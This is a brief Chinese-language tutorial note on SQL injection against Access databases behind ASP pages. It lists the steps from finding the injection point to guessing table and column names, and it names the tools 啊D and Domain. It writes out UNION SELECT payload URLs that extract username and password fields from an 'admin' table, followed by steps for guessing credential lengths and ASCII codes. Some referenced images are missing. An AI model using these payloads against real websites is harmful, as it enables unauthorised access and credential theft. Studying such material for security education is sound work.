access注入
access注入 参考链接:https://www.cnblogs.com/0nth3way/articles/7123033.html
参考工具:啊D注入工具 Domain 辅臣
数据库的判断
1.判断注入点
2.判断数据库类型
第一条是判断是否为access数据库,第二条是sql server。(图片单词错误)
3.判断数据库表
4.判断列名
5.判断有几列 order by
6.联合注入
假如表为:admin 列名有:username,password 。
构造的语句为:
http:url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
在爆出的字段位置填入列名,这里假如为6,8。
构造的语句为:
http:url.asp?id=1 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16 from admin
7.判断账号密码的长度,也可以用大于小于号
8.猜解用户和密码的ascii码
偏移注入